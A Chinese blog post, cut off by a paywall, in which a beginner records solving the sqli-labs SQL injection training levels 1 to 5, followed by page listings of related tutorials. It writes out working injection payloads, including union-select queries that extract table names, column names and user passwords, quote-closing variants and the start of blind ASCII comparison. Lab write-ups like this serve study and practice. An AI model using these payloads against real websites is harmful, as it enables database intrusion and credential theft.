sqli-labs解题记录

最新推荐文章于 2024-05-18 18:51:57 发布
最新推荐文章于 2024-05-18 18:51:57 发布
阅读量413 收藏 1
点赞数
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/theLaziestboy/article/details/115414209
版权

参考:sql注入天书
sqli-labs解题大法

这是刚学web的小白,这份解题记录,是在我浅薄的知识基础上进行解题的,其中记录了我解题遇到的问题,想法与步骤。
但是如果您是来学习sql注入的,网上有很多优秀详细的题解,比如上面两篇参考,您一定会学到更多




less1

前几关都比较简单,常规注就行了。

?id=1 有回显

?id=1=2 有回显 说明是字符型注入

?id=’ or 1=1 --+ 闭合单引号 有回显

此时的sql语句是:SELECT * FROM users WHERE id=’’or 1=1–+‘ LIMIT 0,1


查列数

?id=’ order by 4 --+ 报错

?id=’ order by 3 --+ 无报错

所以为三列


看回显位置

?id=’ union select 1,2,3 --+ 显示2,3为回显位


爆数据库名

?id=’ union select 1,database(),3 --+ 得数据库名为security


爆表名

?id=’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = ‘security’ --+ 得表名有emails,referers,uagents,users


爆列名

?id=’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name = ‘users’ --+ 此处爆得是表users的列名 id,username,password


爆字段名

?id=’ union select 1,group_concat(password),3 from users --+ 此处查的为username的password字段值


注入结束。

less2

?id=1 有回显

?id=1=2 无回显 说明是数字型型注入

步骤同less1,就是不用闭合单引号了,最后的–+可以不加,数字型注入不用闭合单引号。


less3 (单引号括号闭合)

字符型注入(判断方法相同)

?id=1’

image-20210222223538598

报错 ’) 应该是括号没闭合,看了下源代码,查询语句为

$sql=“SELECT * FROM users WHERE id=(’$id’) LIMIT 0,1”;

所以要闭合单引号括号

查表名的语句为

?id=-1’) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’ or ('0

此后步骤同上


less4 (双引号括号闭合)

测试了一下是字符型注入

这道题挺奇怪的,无论是输入什么都是正确的。 “ ?id=1’ order by 4–+”这一句是明显错的却还是可以正常回显,那问题就出在了是否这一句我们认为错误的也是正常的查询字段,那就是说在查询语句看来这一段也是一段正常的字符串,那就是没有闭合的原因了。

试试看括号,双引号什么的,最后当?id=" 时出现了报错如下:
image-20210403120353262

报错"1"")那很明显了

查询语句为

$sql=“SELECT * FROM users WHERE id=(’$id’) LIMIT 0,1”;

闭合双引号括号

?id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema= ‘security’ or ("0

or ("0可以替换成–+ (–+是将其后面所有的都注释掉)


less5 (初级盲注)

当id=1’时报错为

image-20210403092922989

我去看了下源码 sql查询语句如下

$sql=“SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”;

当时我很疑惑为什么id两边的单引号变成了双引号而最后的双引号变成了单引号

其实是个挺乌龙的事情,并不是引号之间发生了变化是因为sql显示报错的时候会将报错的语句用单引号括起来所以看起来像是引号之间发生了改变

所以错误的语句应是 ‘1’’ LIMIT 0,1 为了防止报错我们通常在后面加–+注释调后面的单引号,语句会变成select *from user where id=‘1’–+’ LIMIT 0,1 。 我那时想到–+会将后面的双引号和分号一起注释掉,那不是双引号既不闭合,也不符合sql查询语句需要分号结尾的规则了嘛。反正我在mysql里试是肯定不行的,但是这是在php里,php里用的mysql_qurey()查询数据库

image-20210403094306334

查询字符串不应以分号结束,而且双引号是php的双引号,并不是sql语句的双引号。

由此就可以得知是由单引号括起来的字符注入了,测试发现当语句正确会显示

image-20210403111025122

语句错误显示如下
image-20210403120521557

所以如果想要得到数据库名,就一位一位读取,并将转化为ascii进行比较(因为mysql不区分大小写,所以要转换成ascii),如果是正确的就显示you are in,最后读完判断完就有完整的数据库名了,表列字段名都是同样的思路。

解题

有了思路就开始解题吧

?id=1’ and ascii(substr((s

最低0.47元/天 解锁文章
AleisurE
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQLi-labs-Master(1-22)新手通关宝典
Myosotis_LL的博客
05-18 2116
欢迎来到《SQLi-labs-Master新手通关宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入(SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
详细sqli-labs(1-20)通关讲解
m0_57928318的博客
05-18 1546
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
[网络安全]sqli-labs Less-26 解题详析
等风来
10-21 2047
以上为[网络安全]sqli-labs Less-26 解题详析,我是秋说,我们下次见。
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
[网络安全]sqli-labs Less-26a 解题详析
等风来
10-21 2047
这一关sql语句执行抛出错误后并不在页面输出,所以排除报错注入。可猜测后端查询语句为。
sqli-labs通关教程
m0_65150886的博客
01-23 1492
id=1返回正常页面?id=1'显示sql语句有误?id=1''页面返回正常,证明是字符型注入。因为该页面存在回显,所以我们可以使用联合查询。
sqli-labs 1-10(GET型注入)新手通关详解(高手误入)
b1n的博客
07-16 2952
1.第一关是单引号字符型注入2.用--+进行注释,页面正常显示。
[网络安全]sqli-labs Less-10 解题详析
等风来
07-23 2292
以上为[网络安全]sqli-labs Less-10 解题详析,后续将分享[网络安全]sqli-labs Less-11 解题详析我是秋说,我们下次见。
Sqli-labs全通关教程(手工注入+工具使用sqlmap)
qq_57223070的博客
02-24 1万+
希望能帮到你,sqlmap使用及SQL注入手工
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs.rar
12-22
sqli-labs是一个专门设计用于学习和练习SQL注入技术的平台,特别适合初学者了解和提升SQL注入防御技能。 首先,要搭建sqli-labs,你需要准备以下工具: 1. PHPstudy:一个集成的Web服务器环境,包括Apache、Nginx、...
操作系统期末考试试题和标准答案及评分标准.doc
08-01
操作系统期末考试试题和标准答案及评分标准
Java项目:基于SSM框架实现的疫情物资管理系统【ssm+B/S架构+源码+数据库+开题报告+答辩PPT+毕业论文】
最新发布
08-01
二、技术实现 jdk版本:1.8 及以上 ide工具:IDEA或者eclipse 数据库: mysql5.7 后端:spring+springmvc+mybatis+maven+mysql 前端:JSP,css,js 三、系统功能 系统登录角色包括管理员、采购员、后勤人员、财务人员 管理员管理物资申领,物资出入库,物资采购,财务报销。主要功能包括: 用户登录 用户注册 首页 个人中心 修改密码 个人信息 物资信息管理 物资分类管理 出库信息管理 入库信息管理 申领物资管理 部门管理 职务管理 物资采购管理 财务报销管理 采购员管理 后期人员管理 财务人员管理 采购员查询物资和财务报销,管理物资采购。主要功能包括: 个人中心 修改密码 个人信息 查询财务报销 物资采购管理 查询物资信息 后勤人员对物资进行出入库操作,统计物资出入库的数据,审核并统计物资申领信息。主要功能包括: 个人中心 修改密码 个人信息 查询物资采购 申领物资管理 入库信息管理 出库信息管理 物资信息管理 财务人员查询物资采购,审核财务报销信息。主要功能包括: 个人中心 修改密码 个人信息 财务报销管理等功能
chromedriver-mac-x64_127.0.6497.0.zip
08-01
chromedriver-mac-x64_127.0.6497.0.zip
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值